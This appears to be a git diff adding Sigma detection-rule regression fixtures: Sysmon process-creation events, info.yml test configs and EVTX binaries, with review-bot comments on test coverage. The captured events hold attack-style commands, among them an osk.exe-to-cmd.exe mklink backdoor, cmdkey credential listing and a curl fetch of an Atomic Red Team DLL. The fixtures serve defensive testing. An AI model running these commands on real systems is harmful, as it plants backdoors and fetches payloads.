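Review bot: nothing in the test config consumes this .json record; `regression_tests_info` in the sibling info.yml points only at the `.evtx` (`type: evtx`, `path: .../e9b61244-893f-427c-b287-3e708f321c6b.evtx`), so the JSON and the EVTX can silently drift apart. State (in info.yml or a README next to the data) that the JSON is a rendering of the EVTX kept for reviewers and how it is regenerated, or have the runner validate the two against each other. Also, with a single event and `match_count: 1`, the test only guards against the rule being narrowed; a second sample carrying an `mklink` that does not touch `osk.exe` with an expected count of 0 would also catch the rule being loosened.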
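Review bot: `description: N/A` leaves the sample undocumented; say what the event pins down (a Sysmon EventID 1 for `cmd /c "mklink C:\Windows\System32\osk.exe C:\Windows\System32\cmd.exe"`, run from an interactive cmd.exe as ATTACKRANGE\Administrator at High integrity) so whoever next edits rule e9b61244-893f-427c-b287-3e708f321c6b knows which behaviour the test protects. Minor: `date: 2025-10-24` is earlier than the event's `TimeCreated` of 2025-10-25T13:15:18Z; either use the capture date or document what `date` is meant to record.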
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx new file mode 100644 index 0000000000000000000000000000000000000000..6acc866af93f5644645a8c4f02e9df71b84e60d1 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json new file mode 100644 index 000000000..688d20394 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:16:49.968129Z" + } + }, + "EventRecordID": 8498306, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:16:49.961", + "ProcessGuid": "5AA13A44-CDC1-68FC-F82F-000000004002", + "ProcessId": 608, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"rmdir /s /q malware_folder\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
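Review bot: the only command line exercised is `cmd /c "rmdir /s /q malware_folder"`, i.e. the recursive, quiet form; if rule 41ca393d-538c-408a-ac27-cf1e038be80c ("Directory Removal Via Rmdir") is also meant to fire on the `rd` alias or on `rmdir` without `/s /q`, those variants stay untested, and if it is not, record that scope in info.yml. The constructed target name `malware_folder` is fine as sample data, but confirm the rule keys on the `rmdir` marker and switches rather than anything in the path, otherwise the test passes for the wrong reason.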
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml new file mode 100644 index 000000000..b700d79bf --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml @@ -0,0 +1,13 @@ +id: 20a05730-38e8-4889-ab29-0723f185deb0 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 41ca393d-538c-408a-ac27-cf1e038be80c + title: Directory Removal Via Rmdir +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx 
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx new file mode 100644 index 0000000000000000000000000000000000000000..1269de85a3f75489931406350f68776bde778db1 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json new file mode 100644 index 000000000..50408f0db
--- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:21:33.116889Z" + } + }, + "EventRecordID": 8581967, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:21:33.111", + "ProcessGuid": "5AA13A44-CEDD-68FC-1B30-000000004002", + "ProcessId": 7876, + "Image": "C:\\Windows\\System32\\cmdkey.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Credential Manager Command Line Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "cmdkey.exe", + "CommandLine": "cmdkey /list", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
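Review bot: a lone `cmdkey /list` event with `match_count: 1` cannot detect rule 07f8bdc2-c9b3-472a-9817-5a670b872f53 over-matching, and this PR already adds the ingredients for a cross-check: the `proc_creation_win_cmdkey_adding_generic_creds` sample (rule b1ec66c6-f4d1-4b5c-96dd-af28ccae7727) is a cmdkey.exe execution that the recon rule should not match, and this `/list` event is one the generic-creds rule should not match. Consider wiring each sample into the other rule's `regression_tests_info` with an expected count of 0. Also note the event carries `OriginalFileName: cmdkey.exe` in lowercase while the rule title says `Cmdkey.EXE`; Sigma string matching is case-insensitive by default, so this is fine, but worth a comment in info.yml so nobody "fixes" the casing later.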
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml new file mode 100644 index 000000000..041649eee --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml @@ -0,0 +1,13 @@ +id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 07f8bdc2-c9b3-472a-9817-5a670b872f53 + title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx 
diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx new file mode 100644 index 0000000000000000000000000000000000000000..2bda8a11e3e14dde13dd2ff282183c48d8f29d81 GIT binary patch literal 69632
zZTS}4^5torskrH_Xi1Uz&8JgKZG6@RwPJY+nJQm?U8fL?T#XnZp_vK7ls9^2ohH8n z`_La*apK~fo|0MZASVnh!>U3cYg1|ZKux+uWCZZ%!D~VR%gQJYeipaiN@yHIU~9?Ni>c-Cb*h7A7(1P957k zx#N1oZ9tEoErHf%8gh>yPpKh3^_AlV+7fEe3G7cmK06oMGxn$rMym($&lbdy_*$Il zM~})0K^y9I0KW%-RjWb%0RH=ddQv*EMe$vSk##Hf+webxYt82R5K`_$+yQgk30W*z zddi$$^x|q18&PkR*gjZYjzY#EcLJs4 z@SNd$@r^+jx1;Zlq2JzuAwVHH)Z}OPd^Y^ScXm>h#r<;zxD~lS2po1{F9xhOnBPrE zxgGemVvC#hkTA8u6 zc_Od|eMApz8j&M@8%$j0j^ScRnVQ~ZwkE`H$3BrrAV0*Y)s(6U`|BWk9nQ0+KCC@6 zd>bc)usJVXb1pV#3>xAr&P_ZtA>fEn>)x`pk>&emh+;+Mt5m5CZVHj z$%nAtfb%2}7?NRZ+p~6QHNrHby;2(<^GY$F_TukX=bEP>)Z!rOE;^eh|2!dAFR&do zyA$m*ju98NyAieDjqhrduN7qijQZZyOHy^bMR}wjRsNDS1287PVJDJ&3k$ls2kWr9lx*7rU@=K^9$-^tL zZVT{9WTwu-Bi(}_h4>>=%(L@G2Gg=4`66;Og?OTFTu+>ZA39fFXg6f$EgKeGb9$s_*P3mCuCj+e{og-5^B0(zp(QND<*Y}E{2b2BI1~0;n1XB$=bwHF zD{@K5%kcDM#pjGPD+hJxwI(nso-}>Czwg}wR)7@XECaMHOJ;K}nY9IE+IgFo&8lODQ0ysY5_}WUt%#m|@T6aHUhLOp{yxJ!%eJ1U3OGP8si#$wXG|u@$KIFod z4JaD9{4#A>7o1~R)8(a?)#I+>S(uS~$kLJs<}8+B=KRp|?QYZtZujCd!{7C0I9q3PW~GyDBVSOD*^p&yIp^&`?L1>zW(uVL3 zr)v*nrv^~(`A|-GO|X(;7|-lMJKuq^gPr3$S>zwdADu60?ZBH{*!jsDIXCiZ=SLdL zN>1+lNF(z@eJ@^GI@6MEby=ewsP7b?l-ZWE>$R{%@}lIPQ+af~{ahH`^U<%ahIWtx z9Z0hgmp)IH<07l;>hjX(N!dkmmBoyIN{L-`(|h?B26c{I`~&u1!=~(_^>R~o5!Nr$ zJ5AX|dYLJ^SipPiwJdh=jc@wd#huD7D!Z7)B`Ld@m$6iK(fOa3!{xcO*u_67yQu6U z*bn>Y2K^H*47*4!rF2-LR?LoD!SuM9XeI}6arwMK@CRgGQR=UH-Lr(CD=Mdb4VbGxs}dujCNQ?B!D-ks`6 zImsLI_|#*|MX9a=2<`2 zxl6fD2C*NBq#q`Wu7laf!6UU{CB?_Yan_)DIjC!gxi{mfUk|I;z! 
zCo+ba^fB}7;bC|}9mU*-zEDZ{2x63lp=NGr#rY1X@8reh6Ayr;Qs2qkUasmpnco9g z`9$RtQ%|X?@1(mQbLssQl}{}0Y4IzMPrMKJWBC;RZv1b>%0D~dTiy$gO~2nJW@z}- zW6Q-Mx=H->J82x^&$0i4a)`eJYK`dgpIp5tnJFJy6uYoGITh`q`oDu;-!$9Y^~cO}j${t`teJ9%^LhSSJtXrpQ|cj^9~4hkf|eW6R|i>8A11e@tT$ zxrXE^Wf7G{R2ETL#CfoYr?ObY*th&F;vQuYl|@9?UH#a+>NHc{#s%+i{xi&D&Szv)=TK+~|2m-nCLaBQNwDaP(s^@|vWUteDvPKrqOypW1B;lxJ~w7%_|#*|o!ZJ9 z;^{u+4P^%w$DdH%P?mxxtfM`V5caqg;tik9@`W6J(a#(1Q{GT{LuixV^G$sr)fdvQ z5to%Or1FO93wa3aO)FMwKZ;-Vg`9*v*M*FI-_K(1R~A!QOl2|C zdmLRCa%N+eMwB#*c~8c=kkKo0UC32$o*6#bh?>E=kb^fB@BKK575on4PUtv(kC>Gq zDs!mJVd*f3F^sNyvHoM1Y{%MjltI@XOj^!Zw-vLNG*ObmZM&Z20J&M8RyxBXN zoI}nEr?cFXT+G9KoL*`6ahs*5l{pa0YyL&Py`eKML-cy1QY>9KoL*`6ahs*5l{pa0YyL& TPy`eKML-cy1QdZQ5P|;#8%UvH literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json new file mode 100644 index 000000000..aebb8f310 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:23:21.381915Z" + } + }, + "EventRecordID": 8613670, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:23:21.362", + "ProcessGuid": "5AA13A44-CF49-68FC-2630-000000004002", + "ProcessId": 9032, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": 
"\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml new file mode 100644 index 000000000..66f1312ef --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml @@ -0,0 +1,13 @@ +id: e2254736-78df-48bf-acd9-e36f914e21bc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 + title: Suspicious Curl.EXE Download +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx 
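Review bot: this JSON rendering of the Sysmon Event ID 1 record is not referenced by anything in the change; the info.yml added alongside it lists only the `.evtx` (`type: evtx`, `path: regression_data/.../e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx`) as the regression input. State in the regression-data README or the CI script whether the runner consumes the JSON or it is only a human-readable companion to the binary `.evtx`; otherwise the two copies will drift silently the next time the `.evtx` is regenerated. Since `match_count: 1` makes this a positive-only fixture exercising a single invocation shape (`curl -k ... -o c:\users\public\music\allthethingsx64.dll`), consider pairing it with a benign curl invocation the rule is not expected to match, so that the CI also catches a future edit that widens the selection.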
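Review bot: `description: N/A` leaves the fixture undocumented; replace it with a one-line summary of what the captured event is (the accompanying JSON shows `curl -k https://github.com/redcanaryco/atomic-red-team/raw/.../atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll`, i.e. an Atomic Red Team T1218.010 payload fetch run from `cmd.exe` as `ATTACKRANGE\Administrator`). `date: 2025-10-24` also predates the event's `SystemTime` of `2025-10-25T13:23:21.381915Z`; use the capture date, or document what `date` is meant to record. Lastly, `type: evtx` and `provider: Microsoft-Windows-Sysmon` are free-form strings here with nothing constraining them; document the accepted values (or validate them in the CI script) so that a typo fails the run loudly instead of silently matching nothing.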
diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx new file mode 100644 index 0000000000000000000000000000000000000000..68165e60f22ec9ef4996431b535fa16f3f65b657 GIT binary patch literal 69632 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 